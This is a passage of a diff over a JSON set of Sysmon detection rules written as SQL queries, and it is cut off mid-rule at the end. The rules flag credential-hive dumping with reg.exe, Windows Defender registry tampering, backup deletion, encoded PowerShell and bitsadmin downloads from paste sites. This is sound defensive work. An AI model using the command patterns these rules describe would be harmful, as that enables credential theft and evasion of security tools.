double extension files in ParentCommandLine", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1036.003" + "attack.t1036.007" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Description IN ('Java Update Scheduler', 'Java(TM) Update Scheduler') AND NOT (Image LIKE '%\\\\jusched.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%.doc.lnk' ESCAPE '\\' OR ParentImage LIKE '%.docx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.xls.lnk' ESCAPE '\\' OR ParentImage LIKE '%.xlsx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.ppt.lnk' ESCAPE '\\' OR ParentImage LIKE '%.pptx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.rtf.lnk' ESCAPE '\\' OR ParentImage LIKE '%.pdf.lnk' ESCAPE '\\' OR ParentImage LIKE '%.txt.lnk' ESCAPE '\\' OR ParentImage LIKE '%.doc.js' ESCAPE '\\' OR ParentImage LIKE '%.docx.js' ESCAPE '\\' OR ParentImage LIKE '%.xls.js' ESCAPE '\\' OR ParentImage LIKE '%.xlsx.js' ESCAPE '\\' OR ParentImage LIKE '%.ppt.js' ESCAPE '\\' OR ParentImage LIKE '%.pptx.js' ESCAPE '\\' OR ParentImage LIKE '%.rtf.js' ESCAPE '\\' OR ParentImage LIKE '%.pdf.js' ESCAPE '\\' OR ParentImage LIKE '%.txt.js' ESCAPE '\\') OR (ParentCommandLine LIKE '%.doc.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.doc.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.js%' 
ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.js%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_jusched.yml" + "filename": "proc_creation_win_susp_double_extension_parent.yml" }, { - "title": "Filter Driver Unloaded Via Fltmc.EXE", - "id": "4931188c-178e-4ee7-a348-39e8a7a56821", - "status": "test", - "description": "Detect filter driver unloading activity via fltmc.exe", - "author": "Nasreddine Bencherchali", + "title": "Potential Privilege Escalation To LOCAL SYSTEM", + "id": "207b0396-3689-42d9-8399-4222658efc99", + "status": "experimental", + "description": "Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562", - "attack.t1562.002" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Unknown" + "Weird admins that rename their tools", + "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND CommandLine LIKE '%unload%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%unload rtp\\_filesystem\\_filter' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s 
/i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%PsExec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_fltmc_unload_driver.yml" + "filename": "proc_creation_win_sysinternals_susp_psexec_paexec_flags_.yml" }, { - "title": "WhoAmI as Parameter", - "id": "e9142d84-fbe0-401d-ac50-3e519fb00c89", + "title": "Renamed Jusched.EXE Execution", + "id": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", "status": "test", - "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. 
used by EfsPotato)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group", + "author": "Markus Neis, Swisscom", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.execution", + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%.exe whoami%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Description IN ('Java Update Scheduler', 'Java(TM) Update Scheduler') AND NOT (Image LIKE '%\\\\jusched.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_whoami_as_param.yml" + "filename": "proc_creation_win_renamed_jusched.yml" }, { - "title": "Potential Credential Dumping Via WER", - "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", - "status": "experimental", - "description": "Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass", - "author": "@pbssubhash , Nasreddine Bencherchali", + "title": "SystemStateBackup Deleted Using Wbadmin.EXE", + "id": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", + "status": "test", + "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the \"-p\" parameter in the CommandLine." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Werfault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND CommandLine LIKE '% -u -p %' ESCAPE '\\' AND CommandLine LIKE '% -ip %' ESCAPE '\\' AND CommandLine LIKE '% -s %' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete %' ESCAPE '\\' AND CommandLine LIKE '%systemstatebackup %' ESCAPE '\\' AND CommandLine LIKE '%-keepVersions:0%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_werfault_lsass_shtinkering.yml" + "filename": "proc_creation_win_wbadmin_delete_systemstatebackup.yml" }, { - "title": "Suspicious Reg Add BitLocker", - "id": "0e0255bf-2548-47b8-9582-c0955c9283f5", + "title": "HackTool - Stracciatella Execution", + "id": "7a4d9232-92fc-404d-8ce1-4c92e7caf539", "status": "experimental", - "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", - "author": "frack113", + "description": "Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1486" + "attack.execution", + "attack.defense_evasion", + "attack.t1059", + "attack.t1562.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE 
'%REG%' ESCAPE '\\' AND CommandLine LIKE '%ADD%' ESCAPE '\\' AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\' AND (CommandLine LIKE '%EnableBDEWithNoTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseAdvancedStartup%' ESCAPE '\\' OR CommandLine LIKE '%UseTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKey%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKeyPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessageSource%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessage%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Stracciatella.exe' ESCAPE '\\' OR OriginalFileName = 'Stracciatella.exe' OR Description = 'Stracciatella' OR (Hashes LIKE '%SHA256=9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a%' ESCAPE '\\') OR sha256 IN ('9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956', 'fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a')))" ], - "filename": "proc_creation_win_reg_bitlocker.yml" + "filename": "proc_creation_win_hktl_stracciatella_execution.yml" }, { - "title": "Unusual Child Process of dns.exe", - "id": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", + "title": "PUA - Wsudo Suspicious Execution", + "id": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", "status": "experimental", - "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch", + "description": "Detects usage of wsudo (Windows Sudo Utility). 
Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.execution", + "attack.privilege_escalation", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\conhost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wsudo.exe' ESCAPE '\\' OR OriginalFileName = 'wsudo.exe' OR Description = 'Windows sudo utility' OR ParentImage LIKE '%\\\\wsudo-bridge.exe' ESCAPE '\\' OR (CommandLine LIKE '%-u System%' ESCAPE '\\' OR CommandLine LIKE '%-uSystem%' ESCAPE '\\' OR CommandLine LIKE '%-u TrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '%-uTrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '% --ti %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_dns_susp_child_process.yml" + "filename": "proc_creation_win_pua_wsudo_susp_execution.yml" }, { - "title": "Potential BlackByte Ransomware Activity", - "id": "999e8307-a775-4d5f-addc-4855632335be", + "title": "Dumping of Sensitive Hives Via Reg.EXE", + "id": "fd877b94-9bb5-4191-bb25-d79cbd93c167", "status": "test", - "description": "Detects command line patterns used by BlackByte ransomware in different operations", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the usage of \"reg.exe\" in order to dump sensitive registry hives, which includes SAM, SYSTEM and SECURITY", + "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113", + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "car.2013-07-001" + ], "falsepositives": [ - 
"Unknown" + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND CommandLine LIKE '% -single %' ESCAPE '\\') OR (CommandLine LIKE '%del C:\\\\Windows\\\\System32\\\\Taskmgr.exe%' ESCAPE '\\' OR CommandLine LIKE '%;Set-Service -StartupType Disabled $%' ESCAPE '\\' OR CommandLine LIKE '%powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(%' ESCAPE '\\' OR CommandLine LIKE '% do start wordpad.exe /p %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%save%' ESCAPE '\\' OR CommandLine LIKE '%export%' ESCAPE '\\' OR CommandLine LIKE '%ˢave%' ESCAPE '\\' OR CommandLine LIKE '%eˣport%' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hk˪m%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪ocal\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_loca˪\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪oca˪\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢystem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\syˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢyˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢecurity%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_blackbyte_ransomware.yml" + "filename": "proc_creation_win_reg_dumping_sensitive_hives.yml" }, { - "title": "Suspicious HWP Sub Processes", - "id": "023394c4-29d5-46ab-92b8-6a534c6f447b", - "status": "test", - "description": 
"Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", + "title": "Suspicious Obfuscated PowerShell Code", + "id": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", + "status": "experimental", + "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001", - "attack.execution", - "attack.t1203", - "attack.t1059.003", - "attack.g0032" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Hwp.exe' ESCAPE '\\' AND Image LIKE '%\\\\gbb.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%IAAtAGIAeABvAHIAIAAwAHgA%' ESCAPE '\\' OR CommandLine LIKE '%AALQBiAHgAbwByACAAMAB4A%' ESCAPE '\\' OR CommandLine LIKE '%gAC0AYgB4AG8AcgAgADAAeA%' ESCAPE '\\' OR CommandLine LIKE '%AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg%' ESCAPE '\\' OR CommandLine LIKE '%AuAEkAbgB2AG8AawBlACgAKQAgAHwAI%' ESCAPE '\\' OR CommandLine LIKE '%ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE 
'%B7ADEAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hwp_exploits.yml" + "filename": "proc_creation_win_powershell_encoded_obfusc.yml" }, { - "title": "Scheduled Task Executing Powershell Encoded Payload from Registry", - "id": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", - "status": "test", - "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", - "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", + "title": "Wab Execution From Non Default Location", + "id": "395907ee-96e5-4666-af2e-2ca91688e151", + "status": "experimental", + "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%Get-ItemProperty%' ESCAPE '\\' AND (CommandLine LIKE '%HKCU:%' ESCAPE '\\' OR CommandLine LIKE '%HKLM:%' ESCAPE '\\' OR CommandLine LIKE '%registry::%' ESCAPE 
'\\' OR CommandLine LIKE '%HKEY\\_%' ESCAPE '\\')))" + "attack.defense_evasion", + "attack.execution" ], - "filename": "proc_creation_win_schtasks_reg_loader.yml" - }, - { - "title": "HackTool - PCHunter Execution", - "id": "fca949cc-79ca-446e-8064-01aa7e52ece5", - "status": "experimental", - "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\PCHunter64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PCHunter32.exe' ESCAPE '\\') OR OriginalFileName = 'PCHunter.exe' OR Description = 'Epoolsoft Windows Information View Tools' OR (Hashes LIKE '%SHA1=5F1CBC3D99558307BC1250D084FA968521482025%' ESCAPE '\\' OR Hashes LIKE '%MD5=987B65CD9B9F4E9A1AFD8F8B48CF64A7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=444D210CEA1FF8112F256A4997EED7FF%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3FB89787CB97D902780DA080545584D97FB1C2EB%' ESCAPE '\\' OR Hashes LIKE '%MD5=228DD0C2E6287547E26FFBD973A40F14%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0479F44DF47CFA2EF1CCC4416A538663%' ESCAPE '\\') OR md5 IN ('228dd0c2e6287547e26ffbd973a40f14', '987b65cd9b9f4e9a1afd8f8b48cf64a7') OR sha1 IN ('5f1cbc3d99558307bc1250d084fa968521482025', '3fb89787cb97d902780da080545584d97fb1c2eb') OR sha256 IN ('2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32', '55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c') OR Imphash IN ('444d210cea1ff8112f256a4997eed7ff', '0479f44df47cfa2ef1ccc4416a538663')))" + "SELECT * FROM logs WHERE ((EventID = '1' 
AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wab.exe' ESCAPE '\\' OR Image LIKE '%\\\\wabmig.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Windows Mail\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Windows Mail\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_pchunter.yml" + "filename": "proc_creation_win_wab_execution_from_non_default_location.yml" }, { - "title": "Taskkill Symantec Endpoint Protection", - "id": "4a6713f6-3331-11ed-a261-0242ac120002", + "title": "Suspicious Windows Defender Registry Key Tampering Via Reg.EXE", + "id": "452bce90-6fb0-43cc-97a5-affc283139b3", "status": "experimental", - "description": "Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", - "author": "Ilya Krestinichev, Florian Roth (Nextron Systems)", + "description": "Detects the usage of \"reg.exe\" to tamper with different Windows defender registry keys in order to disable some important features related to protection and detection", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate use by administrators to test software (should always be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%taskkill%' ESCAPE '\\' AND CommandLine LIKE '% /F %' ESCAPE '\\' AND CommandLine LIKE '% /IM %' ESCAPE '\\' AND CommandLine LIKE '%ccSvcHst.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\')) AND ((CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND (CommandLine LIKE '%Real-Time Protection%' ESCAPE '\\' OR CommandLine LIKE '%TamperProtection%' ESCAPE '\\')) OR (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Notification\\_Suppress%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_taskkill_sep.yml" + "filename": "proc_creation_win_reg_defender_tampering.yml" }, { - "title": "Suspicious Download From File-Sharing Website Via Bitsadmin", - "id": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", - "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", - "author": "Florian Roth (Nextron Systems)", + "title": "Time Travel Debugging Utility Usage", + "id": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", + "status": "test", + "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" ], "falsepositives": [ - "Some legitimate apps use this, but limited." 
+ "Legitimate usage by software developers/testers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE 